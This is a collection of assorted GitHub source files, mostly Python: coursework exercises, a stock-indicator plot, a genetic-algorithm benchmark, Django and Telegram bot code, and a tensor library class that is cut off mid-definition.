+{"seq_id":"70092605610","text":"# main.py\n\n# Importazione delle classi e moduli necessari\nimport os\nfrom spleeter.separator import Separator\nfrom pydub import AudioSegment\nfrom video import Video\nfrom Voice import Voice\nfrom diarize import diarize_audio\nfrom synth import synthesize_audio\nfrom vocal_isolation import isolate_vocals\nfrom tabs import ListStreamsTab, ConfigureVoiceTab, SubtitlesTab\nfrom app_state import AppState\nfrom utils import create_output_dir\n\n# Funzione per l'isolamento vocale\ndef separate_file(audio_path):\n    separator = Separator('spleeter:2stems')\n    output_dir = os.path.join(os.path.dirname(audio_path), 'output')\n    os.makedirs(output_dir, exist_ok=True)\n    separator.separate_to_file(audio_path, output_dir)\n\n# Funzione per il mixing dell'audio isolato con l'audio di background\ndef mix_audio(isolated_audio_path, background_audio_path, output_path):\n    isolated_audio = AudioSegment.from_wav(isolated_audio_path)\n    background_audio = AudioSegment.from_wav(background_audio_path)\n    mixed_audio = background_audio.overlay(isolated_audio)\n    mixed_audio.export(output_path, format='wav')\n\ndef main():\n    # Creazione di una istanza di AppState\n    app_state = AppState()\n\n    # Creazione di un'istanza di Video\n    video = Video(\"C:\\\\percorso\\\\del\\\\tuo\\\\video.mkv\")\n\n    # Diarizzazione audio\n    audio_diarization_result = diarize_audio(\"percorso_del_tuo_file_audio.wav\")\n\n    # Sintesi vocale\n    synthesized_audio = synthesize_audio(\"Testo da sintetizzare\")\n\n    # Isolamento delle voci\n    isolated_audio = isolate_vocals(\"percorso_del_tuo_file_audio.wav\")\n\n    # Esegui l'isolamento vocale\n    audio_path = 'C:/path/to/audio.wav'  # Sostituisci con il tuo percorso\n    separate_file(audio_path)\n\n    # Esegui il mixing con un'immaginaria traccia audio di background\n    isolated_audio_path = 'C:/path/to/output/audio/vocals.wav'  # Sostituisci con il percorso effettivo\n    background_audio_path = 'C:/path/to/background_audio.wav'  # Sostituisci con il tuo percorso\n    output_path = 'C:/path/to/output/mixed_audio.wav'  # Sostituisci con il tuo percorso\n    mix_audio(isolated_audio_path, background_audio_path, output_path)\n\n    # Utilizzo dei moduli delle tabs\n    list_streams_tab = ListStreamsTab(None, None)\n    configure_voice_tab = ConfigureVoiceTab(None, None)\n    subtitles_tab = SubtitlesTab(None, None)\n\n    # Altri utilizzi di classi e moduli\n\n    # ...\n\nif __name__ == \"__main__\":\n    # Creazione della directory di output\n    create_output_dir()\n\n    # Chiamata alla funzione main()\n    main()\n","repo_name":"lonelyuniverse/Itadub","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"1455194543","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport wget\nimport os\n\nTICKER = \"CDR\"\nSTART_DATE = \"2018-01-01\"\nEND_DATE = \"2018-12-04\"\nFILENAME = \"data.txt\"\n\nif os.path.exists(FILENAME):\n    os.remove(FILENAME)\n\nurl = \"https://stooq.pl/q/d/l/?s={0}&d1={1}&d2={2}&i=d\".format(TICKER, START_DATE.replace(\"-\",\"\"), END_DATE.replace(\"-\",\"\"))\nwget.download(url, FILENAME)\n\ndata_frame = pd.read_csv(FILENAME, index_col='Data',\n                         parse_dates=True, usecols=['Data', 'Zamkniecie'],\n                         na_values='nan')\n# rename the column header with ticker\ndata_frame = data_frame.rename(columns={'Zamkniecie': TICKER})\ndata_frame.dropna(inplace=True)\nprint(data_frame)\n\n# calculate the standard deviation\nstd_dev = data_frame.rolling(window=20).std()\n# calculate Simple Moving Average with 20 days window\nsma = data_frame.rolling(window=20).mean()\n\nlower_band = sma - 2*std_dev\nlower_band = lower_band.rename(columns={TICKER: \"lower band\"})\n\nupper_band = sma + 2*std_dev\nupper_band = upper_band.rename(columns={TICKER: \"upper band\"})\n\ndata_frame = data_frame.join(upper_band).join(lower_band)\nax = data_frame.plot(title=TICKER)\nax.fill_between(data_frame.index, lower_band['lower band'], upper_band['upper band'], color='#5F9F9F', alpha=0.15)\nax.set_xlabel('Date')\nax.set_ylabel('Price')\nax.grid()\nplt.show(block=True)\n","repo_name":"marianwitkowski/python-ml","sub_path":"bollinger-bands.py","file_name":"bollinger-bands.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"71577005608","text":"import random\nimport math\n\nfrom deap import base\nfrom deap import creator\nfrom deap import tools\nfrom deap import algorithms\n\ncreator.create(\"FitnessMin\", base.Fitness, weights=(-1.0,))\ncreator.create(\"Individual\", list, fitness=creator.FitnessMin)\n\ntoolbox = base.Toolbox()\ntoolbox.register(\"attr_float\", random.uniform, -5.12, 5.12)\ntoolbox.register(\"individual\", tools.initRepeat, creator.Individual,\n                 toolbox.attr_float, 100)\ntoolbox.register(\"population\", tools.initRepeat, list, toolbox.individual)\n\ndef evaluate(individual):\n    f = 10.0 * len(individual)\n    for x in individual:\n        f += x*x - 10.0 * math.cos(2.0 * math.pi * x)\n    return f,\n\n# Operator registering\ntoolbox.register(\"evaluate\", evaluate)\ntoolbox.register(\"mate\", tools.cxOnePoint)\ntoolbox.register(\"mutate\", tools.mutGaussian, mu=0.0, sigma=1.0, indpb=0.01)\ntoolbox.register(\"select\", tools.selTournament, tournsize=2)\n\n# RNG seed\nrandom.seed(64)\n\n# Algorithm\nalgorithms.eaSimple(toolbox.population(n=100), toolbox, cxpb=1.0, mutpb=1.0, ngen=1000,\n                    verbose=False)\n","repo_name":"ChrisTimperley/EC-Software-Benchmarks","sub_path":"setup/deap/rastrigin/rastrigin.py","file_name":"rastrigin.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"12893566812","text":"from django_elasticsearch_dsl.management.commands.search_index import (\n    Command as SearchIndexCommand,\n)\n\nfrom peeringdb_server.context import incremental_period\n\n\nclass Command(SearchIndexCommand):\n    \"\"\"\n    Extends the django_elasticsearch_dsl search_index command to allow incremental updates based\n    off of a max-age period\n    \"\"\"\n\n    def add_arguments(self, parser):\n        super().add_arguments(parser)\n        parser.add_argument(\n            \"--max-age\",\n            type=int,\n            default=3600,\n            help=\"Only update records that have been updated in the last X seconds\",\n        )\n\n    def handle(self, *args, **options):\n        with incremental_period(options[\"max_age\"]):\n            super().handle(*args, **options)\n","repo_name":"peeringdb/peeringdb","sub_path":"peeringdb_server/management/commands/pdb_search_index.py","file_name":"pdb_search_index.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"53"}
+{"seq_id":"40248015304","text":"def partition(array_in, start_index, end_index):\n    \"\"\"Use last element as pivot, move to correct position in sorted array, and place smaller and larger elements around\n    it.\n    \"\"\"\n    smallest_index = (start_index - 1)\n    pivot = array_in[end_index]\n\n    for element in range(start_index, end_index):\n        if array_in[element] < pivot:\n            smallest_index = smallest_index + 1\n            array_in[smallest_index], array_in[element] = array_in[element], array_in[smallest_index]  # Swap elements\n\n    array_in[smallest_index + 1], array_in[end_index] = array_in[end_index], array_in[smallest_index + 1]\n\n    return smallest_index + 1\n\n\ndef quick_sort(input_array, start_index, end_index):\n    if start_index < end_index:\n        partition_index = partition(input_array, start_index, end_index)\n        quick_sort(input_array, start_index, partition_index - 1)  # Sort elements before partition\n        quick_sort(input_array, partition_index + 1, end_index)  # Sort elements after partition\n\n    return input_array\n\n\nif __name__ == \"__main__\":\n    arr = [23, 12, 78, 43, 0, 23, 1, 4]\n    print(quick_sort(arr, 0, len(arr) - 1))\n","repo_name":"crystalattice/Algorithms_and_Interviews","sub_path":"Chapter 16/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"}
+{"seq_id":"15435509111","text":"def twoSum(nums, target):\n    nums_map = {}\n    for i, num in enumerate(nums):\n        nums_map[num] = i\n    ##키값은 숫자, 값은 인덱스\n    for i, num in enumerate(nums):\n        if target-num in nums_map and i != nums_map[target-num]:\n            ## target- 숫자가 nums_map에 잇고 인덱스가 중복되지 않을 때\n            return [i, nums_map[target-num]]\n\nprint(twoSum([2,7,11,15], 9))","repo_name":"elice-python-coding/ESNG_season2","sub_path":"List/p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9350858337","text":"from math import sqrt\nimport timer\n\n\n@timer.timer\ndef primes(n):\n    sieve = set(range(3, n + 1, 2))\n    if n >= 2:\n        sieve.add(2)\n    for i in range(3, int(sqrt(n)) + 1, 2):\n        if i in sieve:\n            sieve -= set(range(2 * i, n + 1, i))\n    return sieve\n\n\n@timer.timer\ndef primes2(n):\n    arr = [True] * (n + 1)\n    sqrt_n = int(sqrt(n))\n    for i in range(2, sqrt_n + 1):\n        if arr[i]:\n            for j in range(i * i, n + 1, i):\n                arr[j] = False\n\n    result = []\n    for i in range(2, n + 1):\n        if arr[i]:\n            result.append(i)\n\n    return result\n\n\nn = 50\n\nres = primes(n)\nres2 = primes2(n)\nprint(res2)\n\nif res != set(res2):\n    print('Error')\n","repo_name":"vchilikov/Olimp","sub_path":"prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"34893010831","text":"from django.shortcuts import render\nfrom .models import MenuImages\n\n\ndef menu(request):\n    \"\"\"\n    A View to return the menu.html\n    where all menu images are returned\n    in a carousel.\n    \"\"\"\n    menus = MenuImages.objects.all()\n    context = {\n        'menus': menus\n    }\n    return render(request, 'menu/menu.html', context)\n","repo_name":"Code-Institute-Submissions/langs-bar","sub_path":"menu/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"69802076970","text":"'''\nCreated on 2018-09-15\n@author: Andrew Chinique\nPledge: I pledge my honor that I have abided by the Stevens Honor System.\n    --Andrew Chinique\n\nCS115 - Hw 2\n'''\nimport sys\nfrom cs115 import map, reduce, filter\nimport dict\n# Be sure to submit hw2.py. Remove the '_template' from the file name.\n\n# Allows up to 10000 recursive calls.\n# The maximum permitted limit varies from system to system.\nsys.setrecursionlimit(10000)\n\n# Leave the following lists in place.\nscrabbleScores = \\\n    [ ['a', 1], ['b', 3], ['c', 3], ['d', 2], ['e', 1], ['f', 4], ['g', 2],\n      ['h', 4], ['i', 1], ['j', 8], ['k', 5], ['l', 1], ['m', 3], ['n', 1],\n      ['o', 1], ['p', 3], ['q', 10], ['r', 1], ['s', 1], ['t', 1], ['u', 1],\n      ['v', 4], ['w', 4], ['x', 8], ['y', 4], ['z', 10] ]\n\nDictionary = ['a', 'am', 'at', 'apple', 'bat', 'bar', 'babble', 'can', 'foo',\n              'spam', 'spammy', 'zzyzva']\n\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',\n            'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\n##Dictionary = dict.Dictionary\n\n# Implement your functions here\n\n# Helper Functions\n\ndef appears(e, L):\n    '''Returns a boolean whether or not element e appears in a sequence\n    input e: an element\n    input L: a sequence (list or string)'''\n    if L == [] or L == '':\n        return False\n    elif L[0] == e:\n        return True\n    else:\n        return appears(e, L[1:])\n\n\ndef breakdown(S):\n    '''Returns a list of all characters that make up a given sequence\n    input S: a sequence'''\n    if S == '' or S == []:\n        return []\n    elif len(S) == 1:\n        return [S]\n    else:\n        return S[0] + breakdown(S[1:])\n\n\ndef removeFirst(e, L):\n    '''Returns a list identical to list L\n    without the first top-level instance of e.\n    input e: an element\n    input L: a list'''\n    if L == []:\n        return []\n    elif L == '':\n        return ''\n    elif L[0] == e:\n        return L[1:]\n    elif isinstance(L, list) == True:\n        return [L[0]] + removeFirst(e, L[1:])\n    else:\n        return L[0] + removeFirst(e, L[1:])\n\n\ndef listCompose(Rack, S):\n    '''Checks whether or not string S can be composed from list R.\n    Returns the string if this is true; returns an empty string if false.\n    input Rack: a list of lowercase letters\n    input S: a string'''\n    # in the case of this HW:\n    # Rack would be the rack of Scrabble tiles\n    # S is any word\n    if S == [] or S == '':\n        return ''\n    elif (S[0] in Rack):\n        trimmedRack = removeFirst(S[0], Rack)\n        if (S[0] + listCompose(trimmedRack, S[1:])) == S:\n            return (S[0] + listCompose(trimmedRack, S[1:]))\n        else:\n            return listCompose(trimmedRack, S[1:])\n    else:\n        return ''\n\n\ndef inDictionary(Words):\n    '''Tests if string in list Words is a word, as defined by Dictionary.\n    Returns the string if true.\n    input S: a list of strings'''\n    if Words == []:\n        return []\n    elif Words[0] in Dictionary:\n        return [[Words[0]] + [wordScore(Words[0], scrabbleScores)]] + inDictionary(Words[1:])\n    else:\n        return inDictionary(Words[1:])\n\n\ndef possibleWords(Rack, Dictionary):\n    '''Returns a list of all possible words in list Dictionary\n    that can be made from a given list of lowercase characters.\n    input L: a list of lowercase characters'''\n    if Rack == []:\n        print('Your rack is empty! Draw some tiles.')\n        return []\n    elif listCompose(Rack, Dictionary[0]) != '':\n        return [listCompose(Rack, Dictionary[0])] + possibleWords(Rack, Dictionary[1:])\n    elif Dictionary[1:] != []:\n        return possibleWords(Rack, Dictionary[1:])\n    else:\n        return []\n\n\ndef highestScore(scoreList):\n    '''Returns the highest scoring word and its point value given\n    a list of words and their scores'''\n    if len(scoreList) == 0:\n        return ['', 0]\n    elif len(scoreList) == 1:\n        return scoreList[0]\n    else:\n        if (scoreList[1])[1] > (scoreList[0])[1]:\n            (scoreList[0]) = (scoreList[1])\n            return highestScore(scoreList[1:])\n        else:\n            (scoreList[1]) = (scoreList[0])\n            return highestScore(scoreList[1:])\n\n\n# Preliminary Functions\ndef letterScore(letter, scorelist):\n    '''Returns a list containing the given character and the\n    Scrabble score for the given letter\n    input letter: a character\n    input scorelist: a list of letters and their Scrabble scores'''\n    # I recognize that the function is allowed to crash if the given\n    # letter is not in scorelist, but I wanted to be able to catch that\n    if letter == [] or letter == '':\n        return 0\n    elif letter not in alphabet:\n        print(\"You entered an invalid character! Try again.\")\n        return 0\n    elif (scorelist[0])[0] == letter:\n        return (scorelist[0])[1]\n    else:\n        return letterScore(letter, scorelist[1:])\n\n\ndef wordScore(S, scorelist):\n    '''Returns the Scrabble score of a given string\n    input S: a string\n    input scorelist: a list of letters and their Scrabble scores'''\n    if S == '' or S == []:\n        print(\"You didn't enter a word! That's zero points.\")\n        return 0\n    elif len(S) == 1:\n        return letterScore(S, scorelist)\n    else:\n        return letterScore(S[0], scorelist) + wordScore(S[1:], scorelist)\n\n\n# Endgoal Functions\ndef scoreList(Rack):\n    '''Returns a list of all possible words in list Dictionary that can be made\n    from a given list of lowercase characters, and their Scrabble scores.\n    input Rack: a list of lowercase characters'''\n    words = possibleWords(Rack, Dictionary)\n    if len(Rack) == 0 or '' in Rack:\n        print('Your rack is invalid! Draw some tiles.')\n        return []\n    else:\n        return inDictionary(possibleWords(Rack, Dictionary))\n\n\ndef bestWord(Rack):\n    '''Returns a list of two elements: the highest scoring word possible\n    made from the characters in list Rack, and that word's score\n    input Rack: a list of lowercase letters'''\n    if len(Rack) == 0 or '' in Rack:\n        print('Your rack is invalid! Draw some tiles.')\n        return []\n    else:\n        return highestScore(scoreList(Rack))\n","repo_name":"timid-one/cs-115","sub_path":"Homework/hw2/hw2.py","file_name":"hw2.py","file_ext":"py","file_size_in_byte":6257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
However also assumes there is only one.\n# That is, only returns the first one.\n\n# Args:\n# file_path (str): Filesystem path of JSON file.\n\n# Returns:\n# namedtuple:\n# \"\"\"\n# try:\n# with open(file_path, 'r', encoding=\"utf8\") as srcFile:\n# srcObj = json.load(srcFile,\n# object_hook=JsonLoader.__metadata_encoder)\n\n# except Exception:\n# raise\n\n# return srcObj[0]\n\n\n# class YamlLoader:\n# \"\"\"_summary_\n\n# Returns:\n# _type_: _description_\n# \"\"\"\n\n # @staticmethod\ndef load_from_file(file_path: str) -> namedtuple:\n \"\"\"\n Extracts the YAML formatted contents of a metadata file to a dictionary\n of NamedTuples. Allowing for the use of dot notation in accessing\n properties.\n NOTE: There can be multiple documents/connections in the loaded YAML\n file. Each is added as a keyed entry in the returned object. Using the\n key from the serialised connection object as the key in the\n NamedTuple.\n\n Args:\n file_path (str): Filesystem path of YAML file.\n\n Returns:\n namedtuple:\n \"\"\"\n result_dict: dict = {}\n with open(file_path, 'r', encoding='utf8') as src_file:\n src_obj = yaml.safe_load_all(src_file)\n for conn in src_obj:\n n_tuple = nested_dict_to_namedtuple(conn)\n result_dict[n_tuple.metadata.name] = n_tuple\n return result_dict\n\n\n\n\n# @contextmanager\n# def data_connections_open(file_path):\n# f = open(file_path, 'r', encoding=\"utf8\")\n# try:\n# yield f\n# finally:\n# f.close()\n\n# # example usage\n# with data_connections_open('file') as f:\n# contents = f.read()\n","repo_name":"scott-diprose/pydtm-lib","sub_path":"src/pydtm/data_connection.py","file_name":"data_connection.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2742830235","text":"import math\n\n\ndef func(x):\n return a*x + b*math.sin(x) - c\n\n\ndef mySearch():\n high = 1000000\n low = -1000000\n prev = None\n while prev != round((high+low) / 2.0, 6):\n middle = low + (high-low)/2.0\n f = func(middle)\n if f == 0:\n return round(middle, 6)\n elif f > 0:\n high = middle+1\n else:\n low = middle\n prev = round(middle, 6)\n return prev\n\n\nt = int(input())\n\nfor i in range(t):\n config = input().split()\n a, b, c = [int(x) for x in config]\n print(mySearch())\n","repo_name":"fisheyz/pc2223","sub_path":"SPOJ/SPOJ_triangle.py","file_name":"SPOJ_triangle.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26372538049","text":"class objetJeu:\n\n maxItem = 10\n\n def __init__(self):\n self.catory = \"arme\"\n\n\nclass arme:\n def __init__(self):\n self.name = \"P90\"\n self.munition = \"9mm\"\n\n\nclass fusil(objetJeu, arme):\n def __init__(self):\n objetJeu.__init__(self)\n arme.__init__(self)\n\n\n\nif __name__ == \"__main__\":\n\n fusilSniper = fusil()\n objetJeu = objetJeu()\n arme = arme()\n\n print(fusilSniper.name, fusilSniper.catory)\n print(isinstance(fusilSniper, objetJeu))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# #héritage isinstance, issubclass\n#\n#\n# #class Mère\n# class Humain:\n# def __init__(self, name, age):\n# self.name = name\n# self.age = age\n#\n# def presentation(self):\n# print(f\"je me nomme {self.name}\")\n#\n# #class fille\n# class Etudiant(Humain):\n# def __init__(self):\n# self.category = \"IT\"\n# self.reduct = \"15%\"\n# Humain.__init__(self, \"Olivier\", 30)\n#\n# def etatEtudiant(self):\n# print(f'je vais bien mais j ai bientôt mes partiels')\n#\n#\n# class 
+{"seq_id":"26372538049","text":"class objetJeu:\n\n    maxItem = 10\n\n    def __init__(self):\n        self.catory = \"arme\"\n\n\nclass arme:\n    def __init__(self):\n        self.name = \"P90\"\n        self.munition = \"9mm\"\n\n\nclass fusil(objetJeu, arme):\n    def __init__(self):\n        objetJeu.__init__(self)\n        arme.__init__(self)\n\n\nif __name__ == \"__main__\":\n\n    fusilSniper = fusil()\n    objet_jeu = objetJeu()\n    mon_arme = arme()\n\n    print(fusilSniper.name, fusilSniper.catory)\n    print(isinstance(fusilSniper, objetJeu))\n\n\n# #héritage isinstance, issubclass\n#\n#\n# #class Mère\n# class Humain:\n#     def __init__(self, name, age):\n#         self.name = name\n#         self.age = age\n#\n#     def presentation(self):\n#         print(f\"je me nomme {self.name}\")\n#\n# #class fille\n# class Etudiant(Humain):\n#     def __init__(self):\n#         self.category = \"IT\"\n#         self.reduct = \"15%\"\n#         Humain.__init__(self, \"Olivier\", 30)\n#\n#     def etatEtudiant(self):\n#         print(f'je vais bien mais j ai bientôt mes partiels')\n#\n#\n# class Employe(Humain):\n#     def __init__(self):\n#         Humain.__init__(self, \"Olivier2\")\n#\n#\n# if __name__ == \"__main__\":\n#     etudiant = Etudiant()\n#     human = Humain(\"Elian\", 30)\n#     human.presentation()\n#\n#     print(isinstance(etudiant, int))\n#     print(issubclass(Etudiant, Humain))\n#     print(issubclass(Humain, Etudiant))\n","repo_name":"Misteur54/ifa-python","sub_path":"Jour3/ex03/demo_ifa.py","file_name":"demo_ifa.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
\"user-not-muted\"))\n","repo_name":"Keys-007/TelegramGroupBot","sub_path":"telegram_bot/plugins/muting.py","file_name":"muting.py","file_ext":"py","file_size_in_byte":3317,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72892217128","text":"# encoding: utf-8\n# Project & File: - \n# Author: aojie654\n# Create Time: 2018.07.10 10:33\n\n\ndef get_text():\n file = open('./hamlet.txt', 'r').read()\n file = file.lower()\n for ch in '!\"#$%&()*+,-./:;<=>?@[\\\\]^_`{|}~':\n file = file.replace(ch, \" \")\n return file\n\n\nhamlet_txt = get_text()\nwords = hamlet_txt.split()\ncounts = {}\nfor word in words:\n counts[word] = counts.get(word, 0) + 1\nitems = list(counts.items())\nitems.sort(key=lambda x: x[1], reverse=True)\nfor i in range(10):\n word, count = items[i]\n print('{0:<10},{1:>5}'.format(word, count))\n","repo_name":"aojie654/codes_store","sub_path":"python/python/songTian/part0_base/week09/t901_final/t005_word_count.py","file_name":"t005_word_count.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39296616218","text":"from turtle import speed\n\nfrom stem import DownloadFailed\nimport speedtest\nst = speedtest.speedtest()\noption = int(input(\"\"\"what is your internet Speed: \n1) Download speed\n2) Upload speed\n3) ping \"\"\"))\n\nif option == 1:\n print(st.download())\nelif option == 2:\n print(st.upload())\nelif option == 3:\n servernames=[]\n st.get_servers(servernames)\n print(st.results.ping) \nelse:\n print(\"Enter your Option: \")\n","repo_name":"rohitrepo1/Python","sub_path":"FUNWITHPYTHON/speedtest.py","file_name":"speedtest.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34780445047","text":"'''\nBase code from pytensor: the python implementation of MATLAB based tensor code\nhttps://code.google.com/p/pytensor\n\nThe regular, dense tensor object.\nThe code is the python implementation of the @tensor folder in the MATLAB Tensor Toolbox\n'''\nimport numpy;\nimport sptensor;\nimport tools;\nimport khatrirao;\n\nclass tensor:\n data = None;\n shape = None;\n \n def __init__(self, data, shape = None):\n \"\"\"Constructor for tensor object.\n data can be numpy.array or list.\n shape can be numpy.array, list, tuple of integers\"\"\"\n if(data.__class__ == list):\n data = numpy.array(data);\n\n if(shape != None):\n if(len(shape) == 0):\n raise ValueError(\"Second argument must be a row vector.\");\n \n if(shape.__class__ == numpy.ndarray):\n if(shape.ndim != 2 and shape[0].size != 1):\n raise ValueError(\"Second argument must be a row vector.\");\n shape = tuple(shape);\n else:\n shape = tuple(data.shape);\n \n\n if (len(shape) == 0):\n if (data.size != 0):\n raise ValueError(\"Empty tensor cannot contain any elements\");\n \n elif (tools.prod(shape) != data.size):\n raise ValueError(\"Size of data does not match specified size of tensor\");\n \n self.shape = shape;\n self.data = data.reshape(self.shape, order='F');\n \n def size(self):\n \"\"\"returns the number of elements in the tensor\"\"\"\n ret = 1;\n for i in range(0, len(self.shape)):\n ret = ret * self.shape(i);\n return ret;\n \n def __str__(self):\n str = \"tensor of size {0}\\n\".format(self.shape);\n str += self.data.__str__();\n return str;\n\n def copy(self):\n \"\"\" returns the deepcopy of tensor object.\"\"\"\n return tensor(self.data.copy(), 
+{"seq_id":"34780445047","text":"'''\nBase code from pytensor: the python implementation of MATLAB based tensor code\nhttps://code.google.com/p/pytensor\n\nThe regular, dense tensor object.\nThe code is the python implementation of the @tensor folder in the MATLAB Tensor Toolbox\n'''\nimport numpy;\nimport sptensor;\nimport tools;\nimport khatrirao;\n\nclass tensor:\n    data = None;\n    shape = None;\n\n    def __init__(self, data, shape = None):\n        \"\"\"Constructor for tensor object.\n        data can be numpy.array or list.\n        shape can be numpy.array, list, tuple of integers\"\"\"\n        if(data.__class__ == list):\n            data = numpy.array(data);\n\n        if(shape != None):\n            if(len(shape) == 0):\n                raise ValueError(\"Second argument must be a row vector.\");\n\n            if(shape.__class__ == numpy.ndarray):\n                if(shape.ndim != 2 and shape[0].size != 1):\n                    raise ValueError(\"Second argument must be a row vector.\");\n            shape = tuple(shape);\n        else:\n            shape = tuple(data.shape);\n\n        if (len(shape) == 0):\n            if (data.size != 0):\n                raise ValueError(\"Empty tensor cannot contain any elements\");\n\n        elif (tools.prod(shape) != data.size):\n            raise ValueError(\"Size of data does not match specified size of tensor\");\n\n        self.shape = shape;\n        self.data = data.reshape(self.shape, order='F');\n\n    def size(self):\n        \"\"\"returns the number of elements in the tensor\"\"\"\n        ret = 1;\n        for i in range(0, len(self.shape)):\n            ret = ret * self.shape[i];\n        return ret;\n\n    def __str__(self):\n        str = \"tensor of size {0}\\n\".format(self.shape);\n        str += self.data.__str__();\n        return str;\n\n    def copy(self):\n        \"\"\" returns the deepcopy of tensor object.\"\"\"\n        return tensor(self.data.copy(), self.shape);\n\n    def dimsize(self, ind):\n        \"\"\" returns the size of the specified dimension.\n        Same as shape[ind].\"\"\"\n        return self.shape[ind];\n\n    def mttkrp(self, U, n):\n        \"\"\" Matricized tensor times Khatri-Rao product for tensor.\n\n        Calculates the matrix product of the n-mode matricization of X with\n        the Khatri-Rao product of all entries in U except the nth.\n\n        Parameters\n        ----------\n        U - factorization\n\n        Returns\n        -------\n        out : Khatri-Rao product as a numpy array\n        \"\"\"\n        N = self.ndims()\n        if len(U) != N:\n            raise ValueError(\"U has the wrong length\");\n\n        Xn = self.permute(numpy.concatenate(([n], numpy.arange(0, n), numpy.arange(n+1, N))))\n        ## use the Fortran ordering system to maintain consistent with Matlab code\n        Xn = Xn.data.reshape(self.dimsize(n), numpy.prod(self.shape)/self.dimsize(n), order='F');\n        Z = khatrirao.khatrirao_array([U[i] for i in range(len(U)) if i != n], reverse=True);\n        V = numpy.dot(Xn, Z);\n        return V;\n\n    def ndims(self):\n        \"\"\" returns the number of dimensions. \"\"\"\n        return len(self.shape);\n\n    def norm(self):\n        \"\"\" returns the Frobenius norm of the tensor.\"\"\"\n        return numpy.linalg.norm(self.data.flatten());\n\n    def tosptensor(self):\n        \"\"\" returns the sptensor object\n        that contains the same value with the tensor object.\"\"\"\n        nnz = numpy.nonzero(self.data)\n        vals = self.data[nnz]\n        totVals = len(vals)\n        vals = numpy.reshape(vals, (totVals, 1))\n        subs = numpy.zeros((totVals, self.ndims()))\n        subs.dtype = 'int'\n        for n in range(self.ndims()):\n            subs[:, n] = nnz[n]\n        return sptensor.sptensor(subs, vals, self.shape)\n        # for n in range(len(nnz)):\n        #     length = len(self.shape);\n        #     sub = tools.allIndices(self.shape);\n        # return sptensor.sptensor(\n        #     sub,\n        #     self.data.flatten().reshape(self.data.size, 1),\n        #     self.shape);\n\n    def permute(self, order):\n        \"\"\" returns a tensor permuted by the order specified. \"\"\"\n        if (order.__class__ == list):\n            order = numpy.array(order);\n\n        if(self.ndims() != len(order)):\n            raise ValueError(\"Invalid permutation order\");\n\n        sortedorder = order.copy();\n        sortedorder.sort();\n\n        if not ((sortedorder == numpy.arange(self.data.ndim)).all()):\n            raise ValueError(\"Invalid permutation order\");\n\n        neworder = numpy.arange(len(order)).tolist();\n        newshape = list(self.shape);\n        newdata = self.data.copy();\n\n        for i in range(0, len(order)-1):\n            index = tools.find(neworder, order[i]);\n            newdata = newdata.swapaxes(i, index);\n\n            temp = newshape[i];\n            newshape[i] = newshape[index];\n            newshape[index] = temp;\n            temp = neworder[i];\n            neworder[i] = neworder[index];\n            neworder[index] = temp;\n\n        newshape = tuple(newshape);\n        return tensor(newdata, newshape);\n\n    def ipermute(self, order):\n        \"\"\" returns a tensor permuted by the inverse of the order specified. \"\"\"\n        # calculate the inverse of iorder\n        iorder = [];\n        for i in range(0, len(order)):\n            iorder.extend([tools.find(order, i)]);\n\n        # returns the permuted tensor by the inverse\n        return self.permute(iorder);\n\n    def ttm(self, mat, dims = None, option = None):\n        \"\"\" computes the tensor times the given matrix.\n        arrs is a single 2-D matrix/array or a list of those matrices/arrays.\"\"\"\n\n        if(dims == None):\n            dims = range(0, self.ndims());\n\n        # Handle when arrs is a list of arrays\n        if(mat.__class__ == list):\n            if(len(mat) == 0):\n                raise ValueError(\"the given list of arrays is empty!\");\n\n            (dims, vidx) = tools.tt_dimscheck(dims, self.ndims(), len(mat));\n\n            Y = self.ttm(mat[vidx[0]], dims[0], option);\n            for i in range(1, len(dims)):\n                Y = Y.ttm(mat[vidx[i]], dims[i], option);\n\n            return Y;\n\n        if(mat.ndim != 2):\n            raise ValueError(\"matrix in 2nd argument must be a matrix!\");\n\n        if(dims.__class__ == list):\n            if(len(dims) != 1):\n                raise ValueError(\"Error in number of elements in dims\");\n            else:\n                dims = dims[0];\n\n        if(dims < 0 or dims > self.ndims()):\n            raise ValueError(\"Dimension N must be between 1 and num of dimensions\");\n\n        # Compute the product\n\n        N = self.ndims();\n        shp = self.shape;\n        order = 